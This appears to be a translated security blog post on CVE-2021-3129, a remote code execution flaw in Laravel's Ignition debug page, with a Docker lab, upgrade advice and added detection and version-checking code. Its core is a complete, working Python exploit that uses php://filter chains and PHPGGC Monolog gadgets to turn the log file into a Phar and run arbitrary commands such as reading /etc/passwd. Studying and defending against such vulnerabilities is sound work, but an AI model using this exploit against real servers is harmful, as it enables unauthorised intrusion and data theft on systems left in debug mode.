CVE-2021-3129 - Laravel debug mode remote code execution vulnerability

I. Vulnerability introduction

Laravel is a concise, open-source PHP web development framework designed around the MVC architecture.

When Laravel runs in debug mode, the Ignition component (which renders the debug error page) exposes an execute-solution endpoint whose MakeViewVariableOptionalSolution passes the attacker-controlled viewFile parameter to file_get_contents() and file_put_contents() without validation. An attacker first abuses php://filter write chains to rewrite the application log (storage/logs/laravel.log) into a valid Phar archive, then opens that file through the phar:// wrapper; this deserializes the archive metadata and, via a Monolog gadget chain, leads to remote code execution.
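Added example (not from the original post or the SNCKER repository): detection logic that classifies requests to the Ignition endpoint by the stage of the technique described above and runs it over constructed sample requests; the function names and sample bodies are assumptions.

```python
import json
import re

# Endpoint and solution class that the technique on this page abuses.
IGNITION_PATH = "/_ignition/execute-solution"
TARGET_SOLUTION = "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution"
# A viewFile that is a stream wrapper or traversal instead of a Blade view path
SUSPICIOUS_VIEWFILE = re.compile(r"^(php://|phar://)|\.\./", re.IGNORECASE)

def classify_request(method, path, body):
    """Return a finding for one request, or None if it looks benign (hypothetical helper)."""
    if method.upper() != "POST" or not path.startswith(IGNITION_PATH):
        return None
    try:
        data = json.loads(body) if body else {}
    except ValueError:
        return "malformed JSON body to Ignition execute-solution"
    if data.get("solution") != TARGET_SOLUTION:
        return None
    view_file = str(data.get("parameters", {}).get("viewFile", ""))
    if view_file.lower().startswith("phar://"):
        return "phar:// viewFile: deserialization trigger (stage 3)"
    if view_file.lower().startswith("php://filter/write="):
        return "php://filter write chain in viewFile: log tampering (stage 1/2)"
    if SUSPICIOUS_VIEWFILE.search(view_file):
        return "stream wrapper or path traversal in viewFile"
    return None

# Constructed sample requests (not captured traffic) modelled on the stages above.
SOLUTION_JSON = '"solution":"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution"'
SAMPLE_REQUESTS = [
    ("GET", "/", ""),
    ("POST", IGNITION_PATH, "{" + SOLUTION_JSON + ',"parameters":{"variableName":"cve20213129",'
     '"viewFile":"php://filter/write=convert.base64-decode/resource=../storage/logs/laravel.log"}}'),
    ("POST", IGNITION_PATH, "{" + SOLUTION_JSON + ',"parameters":{"variableName":"x",'
     '"viewFile":"phar://../storage/logs/laravel.log/test.txt"}}'),
    ("POST", IGNITION_PATH, "{" + SOLUTION_JSON + ',"parameters":{"variableName":"x",'
     '"viewFile":"resources/views/welcome.blade.php"}}'),
]

def scan(requests=SAMPLE_REQUESTS):
    """Return [(index, finding)] for every request that matches the attack pattern."""
    findings = []
    for i, (method, path, body) in enumerate(requests):
        finding = classify_request(method, path, body)
        if finding:
            findings.append((i, finding))
    return findings
```

The benign fourth request (a normal view path) is deliberately not flagged, so the check keys on the wrapper and traversal patterns rather than on the endpoint alone.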

II. Affected versions

Laravel <= 8.4.2

Ignition < 2.5.2

III. Environment preparation & vulnerability reproduction

Environment address:

Environment and EXP download: reply “CVE-2021-3129” in the background to download

Or download from: https://github.com/SNCKER/CVE-2021-3129

Run:

docker-compose up -d

The service listens on port 8888; visit http://127.0.0.1:8888

Vulnerability reproduction:

1. The exp is bundled with the Docker environment downloaded from GitHub. To use it, you also need to download PHPGGC.

Place the exp and PHPGGC in the same directory and run the exp with Python 3.

Running it on macOS produced an error:

Switching to the Kali environment and running the command:

Modify the script to add the parameters:


Python script code:

#!/usr/bin/python3
import requests as req
import os, uuid


class Exp:
    # Each chain shells out to phpggc to build a Phar, base64-encodes it and
    # rewrites it as quoted-printable UTF-16LE so the php://filter chain decodes it.
    __gadget_chains = {
        "monolog_rce1": r"""
php -d 'phar.readonly=0' phpggc/phpggc monolog/rce1 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys; print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt
""",
        "monolog_rce2": r"""
php -d 'phar.readonly=0' phpggc/phpggc monolog/rce2 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys; print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt
""",
        "monolog_rce3": r"""
php -d 'phar.readonly=0' phpggc/phpggc monolog/rce3 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys; print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt
""",
    }

    __delimiter_len = 8  # delimiter length

    def __vul_check(self):
        resp = req.get(self.__url, verify=False)
        if resp.status_code != 405 and "laravel" not in resp.text:
            return False
        return True

    def __payload_send(self, payload):
        header = {
            "Accept": "application/json"
        }
        data = {
            "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
            "parameters": {
                "variableName": "cve20213129",
                "viewFile": ""
            }
        }
        data["parameters"]["viewFile"] = payload
        resp = req.post(self.__url, headers=header, json=data, verify=False)
        # print(resp.text)
        return resp

    def __command_handler(self, command):
        """
        Because user commands are injected into commands generated by the payload,
        some processing is done to prevent affecting the structure.
        """
        self.__delimiter = str(uuid.uuid1())[:self.__delimiter_len]  # Delimiter used to locate command execution results on the page.
        # print(delimiter)
        command = "echo %s && %s && echo %s" % (self.__delimiter, command, self.__delimiter)
        # print(command)
        escaped_chars = ["'", "&", "|"]  # I only thought of these; more can be added.
        for c in escaped_chars:
            command = command.replace(c, '\\' + c)
        # print(command)
        return command

    def __clear_log(self):
        return self.__payload_send(
            "php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log")

    def __gen_payload(self, gadget_chain):
        gen_shell = self.__gadget_chains[gadget_chain] % (self.__command)
        # print(gen_shell)
        os.system(gen_shell)
        with open('payload.txt', 'r') as f:
            payload = f.read().replace('\n', '')
        os.system("rm payload.txt")
        # print(payload)
        return payload

    def __decode_log(self):
        return self.__payload_send(
            "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log")

    def __unserialize_log(self):
        return self.__payload_send("phar://../storage/logs/laravel.log/test.txt")

    def __rce(self):
        text = self.__unserialize_log().text
        # print(text)
        echo_find = text.find(self.__delimiter)
        # print(echo_find)
        if echo_find >= 0:
            return text[echo_find + self.__delimiter_len + 1: text.find(self.__delimiter, echo_find + 1)]
        else:
            return "[-] RCE echo is not found."

    def exp(self):
        for gadget_chain in self.__gadget_chains.keys():
            print("[*] Try to use %s for exploitation." % (gadget_chain))
            self.__clear_log()
            self.__clear_log()
            self.__payload_send('a' * 2)
            self.__payload_send(self.__gen_payload(gadget_chain))
            self.__decode_log()
            print("[*] Result:")
            print(self.__rce())

    def __init__(self, target, command):
        self.target = target
        self.__url = req.compat.urljoin(target, "_ignition/execute-solution")
        self.__command = self.__command_handler(command)
        if not self.__vul_check():
            print("[-] [%s] seems not vulnerable." % (self.target))
            print("[*] You can also call obj.exp() to force an attack.")
        else:
            self.exp()


def main():
    Exp("http://127.0.0.1:8888", "cat /etc/passwd")


if __name__ == "__main__":
    main()

IV. Security recommendations

It is recommended to upgrade the Laravel framework to 8.4.3 or later, or upgrade the Ignition component to 2.5.2 or later. Since the vulnerable code path is only reachable in debug mode, also make sure APP_DEBUG is disabled in production.
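Added example (not part of the original post): a check that reads a project's composer.lock for the affected versions listed in section II and its .env for debug mode, and reports whether both preconditions for this bug are present; the function names and the constructed composer.lock excerpt are assumptions.

```python
import json
import re

# First fixed releases, from the affected versions stated on this page
# (laravel/framework <= 8.4.2 and facade/ignition < 2.5.2 are vulnerable).
FIXED = {
    "laravel/framework": (8, 4, 3),
    "facade/ignition": (2, 5, 2),
}

def parse_version(text):
    """'v8.4.2' or '8.4.2' -> (8, 4, 2); tolerates suffixes such as '2.5.2-beta'."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("unparseable version: %r" % text)
    return tuple(int(x) for x in m.groups())

def vulnerable_packages(lock_json):
    """Return {package: installed_version} for tracked packages below the fixed release."""
    lock = json.loads(lock_json)
    found = {}
    for pkg in lock.get("packages", []) + lock.get("packages-dev", []):
        name = pkg.get("name")
        if name in FIXED and parse_version(pkg["version"]) < FIXED[name]:
            found[name] = pkg["version"]
    return found

def debug_enabled(env_text):
    """True if APP_DEBUG=true in a .env file (debug mode is the precondition for this bug)."""
    for line in env_text.splitlines():
        line = line.strip()
        if line.startswith("APP_DEBUG="):
            return line.split("=", 1)[1].strip().strip('"\'').lower() == "true"
    return False

def assess(lock_json, env_text):
    """Exploitable only when a vulnerable package AND debug mode are both present."""
    pkgs = vulnerable_packages(lock_json)
    debug = debug_enabled(env_text)
    return {"vulnerable_packages": pkgs, "debug": debug, "exploitable": bool(pkgs) and debug}

# Constructed composer.lock excerpt and .env, not taken from a real project.
SAMPLE_LOCK = json.dumps({"packages": [
    {"name": "laravel/framework", "version": "v8.4.2"},
    {"name": "monolog/monolog", "version": "2.2.0"}],
    "packages-dev": [{"name": "facade/ignition", "version": "2.5.1"}]})
SAMPLE_ENV = "APP_NAME=Laravel\nAPP_ENV=local\nAPP_DEBUG=true\n"
```

Ignition is normally a require-dev dependency, so the scan covers packages-dev as well; a production install built with --no-dev will not list it at all.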

Download link:

laravel.com/docs/8.x#la…

References:

mp.weixin.qq.com/s/ShRvF_YeV…

github.com/SNCKER/CVE-…

www.venustech.com.cn/new_type/a…

Disclaimer: The security tools and procedures (methods) provided on this site may be offensive and are intended only for security research and teaching; use them at your own risk!

Disclaimer: Copyright belongs to the author. Commercial reprint please contact the author for authorization, non-commercial reprint please indicate the source.

Author: thelostworld
